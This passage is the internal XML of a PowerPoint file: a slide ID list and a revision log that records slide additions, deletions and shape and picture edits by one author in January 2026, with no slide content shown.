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9" r:id="rId3"/>
    <p:sldId id="279" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="270" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="276" r:id="rId9"/>
    <p:sldId id="274" r:id="rId10"/>
    <p:sldId id="275" r:id="rId11"/>
    <p:sldId id="277" r:id="rId12"/>
    <p:sldId id="278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3" r:id="rId26"/>
    <p:sldId id="292" r:id="rId27"/>
    <p:sldId id="294" r:id="rId28"/>
    <p:sldId id="295" r:id="rId29"/>
    <p:sldId id="296" r:id="rId30"/>
    <p:sldId id="257" r:id="rId31"/>
    <p:sldId id="298" r:id="rId32"/>
    <p:sldId id="299" r:id="rId33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A2B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7ED3B4-9D88-4FAE-BCF7-FBA6B1DF965E}" v="97" dt="2026-01-30T12:50:18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7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Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd addMainMaster delMainMaster modMainMaster modShowInfo">
      <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T13:28:13.377" v="4381" actId="2696"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:35:10.726" v="4186"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:48:55.092" v="2014" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="256"/>
            <ac:spMk id="53" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:35:10.726" v="4186"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:10:43.786" v="4084"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="257"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:30.120" v="4263" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="258"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:30.276" v="4264" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="259"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:30.409" v="4265" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="260"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:30.533" v="4266" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="261"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:30.683" v="4267" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="262"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:30.872" v="4268" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="263"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:31.077" v="4269" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="264"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:31.151" v="4270" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="265"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:31.309" v="4271" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:31.868" v="4272" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="267"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:50:33.076" v="4273" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="268"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:35:10.726" v="4186"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1189666581" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T00:33:04.151" v="18" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1189666581" sldId="269"/>
            <ac:spMk id="53" creationId="{32E46721-3627-55E6-ED9B-97AB47AA96A9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:20.577" v="4237" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1253651154" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T00:33:44.326" v="28" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1253651154" sldId="270"/>
            <ac:spMk id="3" creationId="{940C42E3-2017-B929-DF85-F49C9D456128}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T00:42:18.316" v="220" actId="948"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1253651154" sldId="270"/>
            <ac:spMk id="4" creationId="{A77EBF71-DA12-8880-15F9-384D81828EF3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:20.577" v="4237" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1253651154" sldId="270"/>
            <ac:spMk id="5" creationId="{AC8E6C32-21C6-78E5-2B29-B91DB4EB2FED}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:07.744" v="4235" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2769545046" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:24:25.501" v="916" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:spMk id="3" creationId="{E068F9C6-1167-BD72-3612-1599DC002B05}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T14:29:29.442" v="3191" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:spMk id="4" creationId="{B6EFEEBF-FE48-F253-321E-FC5F2533490C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:26:42.479" v="923" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:spMk id="12" creationId="{25D4F473-30D1-7B24-21E0-B6C0DC5D722E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:26:42.479" v="923" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:spMk id="15" creationId="{B2FB264E-C12A-776D-C952-C64BFB3CF2D9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:07.744" v="4235" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:spMk id="19" creationId="{536967BB-ACEF-F551-457A-F2E75DCBE9B4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:26:42.479" v="923" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:grpSpMk id="16" creationId="{527829C7-3C29-79D2-1B8E-60E1D6D0D6FB}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:26:42.479" v="923" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:picMk id="6" creationId="{B2B5FD60-2034-EA60-D245-16BB32109940}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:26:42.479" v="923" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:picMk id="7" creationId="{785B67FB-ACAF-1DAB-1E80-DB2E6D57E0BB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:26:42.479" v="923" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:picMk id="8" creationId="{957B4D53-E217-4430-766B-B713BFD0290F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:26:42.479" v="923" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:picMk id="9" creationId="{EE2601A3-FB4E-A0CD-27DC-25B9F455C2EC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:26:42.479" v="923" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:picMk id="10" creationId="{F6A19EB1-A25E-018A-9A0A-C95B412FBAD7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:26:42.479" v="923" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:picMk id="11" creationId="{D8C35979-6D6E-3E2D-1EE9-532FBB4F0F1F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:39:29.354" v="4208" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:picMk id="13" creationId="{897BEF0E-997E-DD5E-37E8-5E7A200AE0BD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:26:42.479" v="923" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:picMk id="14" creationId="{D7C0B824-AAA4-D712-7A1A-31692624159D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:39:33.128" v="4212" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2769545046" sldId="271"/>
            <ac:picMk id="18" creationId="{B466A234-9E82-369D-3C22-B42965FC1409}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:24.148" v="4238"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="583945098" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:11:48.572" v="895" actId="948"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="583945098" sldId="272"/>
            <ac:spMk id="3" creationId="{E6CCA586-FAAF-AEC9-2E4C-D80AA29898E5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:11:32.474" v="890" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="583945098" sldId="272"/>
            <ac:spMk id="4" creationId="{C09EBED1-D4AF-BA6D-8480-78FB8C3BCC87}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:24.148" v="4238"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="583945098" sldId="272"/>
            <ac:spMk id="5" creationId="{992D1F4D-5F23-1CAB-9CDB-7FB863F575A2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:17:22.441" v="900" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="583945098" sldId="272"/>
            <ac:picMk id="7" creationId="{6C3BFE51-234D-F3EF-3D26-FC7B0082FCEB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:23:42.966" v="911" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="583945098" sldId="272"/>
            <ac:picMk id="9" creationId="{926F2190-615B-DC57-1113-A3D59E7BB576}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-20T01:21:54.391" v="910" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="583945098" sldId="272"/>
            <ac:picMk id="11" creationId="{0CCC72C2-8728-550D-DDE6-5A60D5A37932}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:26.494" v="4239"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2883950643" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-24T12:42:30.115" v="963" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2883950643" sldId="273"/>
            <ac:spMk id="3" creationId="{C82A194B-9E26-2AF1-F580-F525E28CDA7A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-24T12:52:26.508" v="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2883950643" sldId="273"/>
            <ac:spMk id="4" creationId="{1B80ACC0-EE1B-2FA6-84A8-9A8CF9287F8A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:26.494" v="4239"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2883950643" sldId="273"/>
            <ac:spMk id="5" creationId="{D54F75A4-DEEA-85E6-FF61-BA0AB220A9D2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:49:52.302" v="2017" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2883950643" sldId="273"/>
            <ac:spMk id="14" creationId="{7A66D07F-458B-77D4-5FD3-BC383FA4FF3C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:49:56.613" v="2019" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2883950643" sldId="273"/>
            <ac:picMk id="13" creationId="{879C844B-A47A-DFF1-23FB-582F7BE17690}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:31.046" v="4241"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2455939735" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-24T13:53:28.196" v="1359" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455939735" sldId="274"/>
            <ac:spMk id="3" creationId="{0BDB7CE9-A4CA-C74B-16CB-361A87F85E25}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-24T12:52:43.439" v="1044" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455939735" sldId="274"/>
            <ac:spMk id="4" creationId="{1A8115E2-C740-E3A5-29CE-69E35750D29C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-24T12:55:21.353" v="1062"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455939735" sldId="274"/>
            <ac:spMk id="5" creationId="{7EDF7C0B-8863-AC6D-DE5B-0D75C7E17C57}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:31.046" v="4241"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455939735" sldId="274"/>
            <ac:spMk id="6" creationId="{84B55968-2A08-CDF6-BB80-5E546153534F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-24T13:23:17.387" v="1237" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455939735" sldId="274"/>
            <ac:picMk id="7" creationId="{4235D9F5-CD8F-AFF7-F91C-39E8FD8A534C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:33.549" v="4242"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="280649395" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:07:29.982" v="2245" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="280649395" sldId="275"/>
            <ac:spMk id="3" creationId="{1521DE8F-076D-B472-E481-CF243C5B517E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:33.549" v="4242"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="280649395" sldId="275"/>
            <ac:spMk id="7" creationId="{387EAC3E-24DB-B009-F018-4F30F80BDE3F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:07:30.254" v="2246" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="280649395" sldId="275"/>
            <ac:spMk id="9" creationId="{529CD08F-227A-6095-45A5-425EA6F86D78}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:07:31.926" v="2251" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="280649395" sldId="275"/>
            <ac:picMk id="8" creationId="{35036B09-376C-A751-9A2D-62373A6C7866}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:28.684" v="4240"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2691321914" sldId="276"/>
